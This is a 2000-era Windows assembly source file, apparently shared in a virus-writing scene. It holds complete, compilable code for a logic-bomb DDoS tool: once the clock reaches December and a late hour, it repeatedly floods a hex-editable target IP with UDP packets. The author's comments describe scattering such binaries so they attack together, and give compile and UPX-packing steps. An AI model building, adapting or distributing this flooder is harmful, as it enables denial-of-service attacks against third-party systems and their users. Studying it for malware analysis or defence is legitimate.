; Frost_Byte [S/I] Saturday, July 22nd, 2000 ;---------------Main Ramblings--------------- ; The following code is a demonstration of an idea in which I have ; had for quite awhile, but never felt like sitting down and typing ; out. One of the problems with the DDOS servers is that commands are ; sent back and forth, but what if the Logic Bomb ideals were used to ; make basically a "ticking timebomb" ready to pounce on a site when ; certain conditions are met? The further away the attack is set...the ; more systems would be aquired. In turn, the longer the binaries are ; floating about, there is a higher probability that the code will be ; found and preventative measures will be taken. All I am doing is presenting ; this idea and a simple demonstartion. The file loads, checks to see if ; it is December, and after 10:00 pm. If so...the attack insues. It sends ; 10 1K packets (which are the first 1K of the Executible itself..just for ; kicks, heh). Then, the program waits 30 seconds, and tries again. At ; any error (such as not being able to initialize winsock) it jumps to the 30 ; second wait. Basically, the program contenously loops until the process is ; killed. I incorporated no API-call hiding, Re-starting on boot, or Process ; hiding methods...this is just proof of what could be done. Also, by the ; allocating of bytes..one EXE can be hexedited for a different IP to attack, ; and the file can be compressed (UPX threw it down to about 3K). This was tried ; on my Winnt 4 box to attack a Linux box over my LAN, and it seemed relatively ; stable and wasn't a real RAM-hog. BTW...hope you enjoy the commenting... ;-------------Hello Hello------------- ; I'm going to give a hello to Miss Ashley, A^T (thanks for catching a packet for me), ; and to my new gf Miss Jill. ;-------------Up-and-coming items------------- ; Have a Binder/Stup about 75% complete that has a 2-4K stub....a Commandprompt redirector ; in TASM, and other numberous odds and ins.... ;-------------Outwards Out Words....------------- ; I'd just like to thank you for atleast looking at this article, and I look foward to ; bringing more ideas to light. Later oh... ;-----Compiling----- ; tasm /mx /m1 UDPer ; tlink32 -Tpe -aa -c -x UDPer,,,import32.lib ;------------------------------------------------------------------------------------ ;--------------------------------------The-Code-------------------------------------- ;------------------------------------------------------------------------------------ .386 locals jumps .model Flat ,StdCall ;----------\Structures\---------- WSAdata STRUC wVersion dw ? wHighVersion dw ? szDescription db ? szSystemStatus db ? iMaxSockets dw ? iMaxUdpDg dw ? lpVendorInfo dw ?,? WSAdata ENDS sockaddr_in STRUC sin_family dw ? sin_port dw ? sin_addr dd 0 sin_zero db 8 dup (0) sockaddr_in ENDS SYSTEMTIME STRUC wYear dw ? wMonth dw ? wDayOfWeek dw ? wDay dw ? wHour dw ? wMinute dw ? wSecond dw ? wMilliseconds dw ? SYSTEMTIME ENDS ;----------/Structures/---------- ;----------\API Declarations\---------- ; API for Logic Bomb data extrn GetLocalTime:PROC extrn Sleep:PROC ; Winsock API calls extrn WSAStartup:PROC extrn WSACleanup:PROC extrn htons:PROC extrn bind:PROC extrn socket:PROC extrn inet_addr:PROC extrn sendto:PROC extrn closesocket:PROC ;----------/API Declarations/---------- .Data ;----------\Winsock-used Data\---------- WSAdats WSADATA ? sin1 sockaddr_in ? sin2 sockaddr_in ? INADDR_ANY equ 000000000h sockaddr_size equ 010h saddr_len dw 16 MySocket dd 0 ;----------/Winsock-used Data/---------- MySysTime SYSTEMTIME ? AttackedAddr db '127.0.0.1' ; Localhost, but leave enough nulls afterwhich db 7 dup (0) ; so that the IP can be hexedited ; xxx.xxx.xxx.xxx+NULL allocated .Code Start_Code: startsocks: ;----------\Socket initialization & Configuration\---------- call WSAStartup, 0202h, offset WSAdats ; Intialize Winsock cmp eax,-1 jz error call socket, 002h, 002h, 011h ; Socket ( AF_INET , SOCK_DGRAM , IPPROTO_UDP) test eax,eax jb error mov MySocket, eax call htons, eax ; Set up Local Socket & Bind the settings mov [sin1.sin_port],ax ; Using the current socket handle as the source mov [sin1.sin_family],002h ; port for abit of randomness mov [sin1.sin_addr],INADDR_ANY call bind, MySocket, offset sin1, sockaddr_size cmp eax,-1 jz error call htons, 200 ; Set up Local Socket & Bind the settings mov [sin2.sin_port],ax ; Using the current socket handle as the source mov [sin2.sin_family],002h ; port for abit of randomness call inet_addr, offset AttackedAddr mov [sin2.sin_addr],eax ;----------/Socket initialization & Configuration/---------- ;----------\Logic Bomb\---------- call GetLocalTime, offset MySysTime cmp MySysTime.wMonth, 12 ; Is it the 12th month (Dec)? jnz error ; If not..let's stop cmp MySysTime.wHour, 20 ; Is it 10:00pm or later? jle error ; If not..let's stop ;----------/Logic Bomb/---------- ;----------\The UDP Bomb\---------- xor ecx,ecx Looper: inc ecx push ecx call sendto, MySocket, offset Start_Code, 1024, 0, offset sin2, sockaddr_size ; Long call for cmp eax,-1 ; the UDP send jz error call Sleep, 500 ; Good to keep a modem from dying pop ecx cmp ecx,10 jnz Looper ; Send 10 packets (packet is just the ; first 1K of this program...saves some ; bytes instead of using a constant ; string) ;----------\The UDP Bomb\---------- error: call closesocket, MySocket call WSAcleanup call Sleep, 30000 ; Sleep to keep modems from flooding jmp startsocks ; themselves off and to keep traffic End Start_Code ; from being too outlandish End ;------------------------------------------------------------------------------- ;------------------------------------------------------------------------------- ;-------------------------------------------------------------------------------